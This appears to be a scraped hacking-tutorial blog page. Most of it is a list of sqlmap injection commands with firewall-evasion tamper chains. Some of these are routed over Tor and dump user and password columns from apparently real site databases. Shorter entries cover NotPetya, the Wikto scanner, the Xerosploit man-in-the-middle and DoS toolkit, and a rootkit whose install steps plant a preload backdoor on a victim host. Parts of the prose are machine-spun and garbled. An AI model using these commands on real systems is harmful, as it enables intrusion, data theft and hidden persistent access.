Learn Penetration Testing And Ethical Hacking Online.


  • Facebook
  • Popular Posts

    sqlmap advance commands and waf bypass method

    sqlmap temper waf bypass method

    --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
    --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs
    --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs
    -v3 --technique=T --no-cast --fresh-queries --banner
    sqlmap -u http://www.********?id=1 --level 2 --risk 3 --batch --dbs

    -f -b --current-user --current-db --is-dba --users --dbs idcategoria=8

    --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs --     tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

    sqlmap -u "http://URL/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1" --technique BT --dbms MYSQL --risk 3 --level 5 -p wpas_keys --tamper space2comment --sql-shell

    --risk 3 --level 5 --random-agent --proxy --dbs
    --random-agent --dbms=MYSQL --dbs --technique=B"
    --identify-waf --random-agent -v 3 --dbs
     : --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
    : --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3
    --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump
    --tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent

    sqlmap.py -u -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
    --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2
    -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --colu

    C:\Python27\python.exe sqlmap.py --wizard
    --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql

    sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql

    sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql

    sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql

    --level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords"

    sqlmap -u ‘http://www.site.com:80/search.cmd?form_state=1’ –level=5 –risk=3 -p ‘item1’ –tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

    --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent
    --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables
    --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns
    --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump

    tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --dbms=mssql
    Continue Reading
    NotPetya Ransomeware Wreaking Havoc

    The latest splash has been made by the Petya or NotPetya Ransomware that exploded in Ukraine and is infecting companies all over the World. It’s getting some people in deep trouble as there’s no way to recover the files once encrypted.

    The malware seems to be trying to hide its intent as it doesn’t really seem to be about making money, $300 is a pretty low amount and they setup a very poor mechanism for collecting the money (the Posteo account they used has been shut down).

    At the current value of Bitcoin there’s around $10,000 USD in the wallet mentioned, but with the e-mail address down there’s no way for the victims to get in contact with the bad guys to decrypt their files.
    It’s quite probably a nation state attack aimed at the Ukraine, and it just happened to spread outside. It also doesn’t spread over the Internet like WannaCry but only over the local network.
    It seems to be using a whole bunch of tech with bits we’ve posted about like Mimikatz and the NSA leak (a modified version of EternalBlue).
    It’s definitely some pretty slick coding and an impressive piece of malware. But why it’s been unleashed? We’re unlikely to find out unfortunately.

    Continue Reading
    Wikto Scanner Download – Web Server Security Tool

    Wikto is an Open supply (GPL) net server scanner that performs comprehensive tests against net servers for multiple things, as well as over 3500 probably dangerous files/CGIs, versions on over 900 servers, and version specific issues on over 250 servers.   

    What is Wikto

    Wikto is not a web application scanner. It is wholly unaware of the appliance (if any) that’s running on the net website. So – it'll not search for SQL injection issues, authorization issues etc. on a web site. It is additionally not a network level scanner – therefore it won’t try and notice open ports or see if the net website is correctly firewalled. Wikto rather operates between these 2 levels – it tries to, for instance, find interesting directories and files on the web site, it looks for sample scripts that can be abused or finds famous vulnerabilities within the internet server implementation itself.

    How does Wikto work?

    To understand the Wikto element of the applying you would like to know what Nikto is. Nikto may be a text based mostly internet server vulnerability scanner written in PERL by the great guys at CIRT. Nikto scans for over 3000 potential issues on an internet server. It is on the far side the scope of the document to clarify what styles of checks it performs – you'll be able to scan all concerning on the Nikto post.Like the BackEnd labourer, the scanner has the ability to perform fuzzy logic on the responses thereby greatly reducing the occurrence of false positives. It additionally has the flexibility to import directories from each the BackEnd labourer and also the Googler.

    Wikto vs Nikto

    is not just Nikto for Windows. The Nikto scan is just of its several functions (and it will the Nikto scans wholly totally different than Nikto does).

    It additionally has extra practicality together with mathematical logic error code checking, a back-end labourer, Google assisted directory mining and real time protocol request/response observation.Wikto Web Security Scanner RequirementsTo get the most out of the app you also need to install the 

    following:WinHTTrack – an internet mirroring tool (you will use the default install)HTTprint – an internet server procedure tool (by default, Wikto appearance for this within the c:\Tools directory, however you'll be able to set up it)
    You can download Wikto here: https://github.com/sensepost/wikto/

    Continue Reading

    Xerosploit may be a penetration testing toolkit whose goal is to perform man within the middle attacks for testing functions. It brings numerous modules that permit to understand economical attacks, and additionally permits to hold out denial of service attacks and port scanning. power-driven by bettercap and nmap.                                               



    • nmap
    • hping3
    • build-essential
    • ruby-dev
    • libpcap-dev
    • libgmp3-dev
    • tabulate
    • terminaltables


    Dependencies will be automatically installed.
    git clone https://github.com/LionSec/xerosploit
    cd xerosploit && sudo python install.py
    sudo xerosploit


    • Port scanning
    • Network mapping
    • Dos attack
    • Html code injection
    • Javascript code injection
    • Download intercaption and replacement
    • Sniffing
    • Dns spoofing
    • Background audio reproduction
    • Images replacement
    • Drifnet
    • Webpage defacement and more ...
    Continue Reading
    Linux Userland Preload Rootkit

    BEURK is an userland preload rootkit for GNU/Linux, heavily targeted around anti-debugging and anti-detection.

    Being a userland rootkit it provides restricted privileges (whatever the user has basically) vs a superuser or root level rootkit.


    Hide assailant files and directories
    Realtime log cleanup (on utmp/wtmp)
    Anti method and login detection
    Bypass unhide, lsof, ps, ldd, netstat analysis
    Furtive PTY backdoor consumer 


    Compile git clone https://github.com/unix-thrust/beurk.git

    cd beurk


    Install scp libselinux.so root@victim.com:/lib/

    ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload
    • ./client.py victim_ip:port # connect with furtive backdoor


    The following packages are not required in order to build BEURK at the moment:
    • libpcap – to avoid local sniffing
    • libpam – for local PAM backdoor
    • libssl – for encrypted backdoor connection
    You can download BEURK here: https://github.com/unix-thrust/beurk

    Continue Reading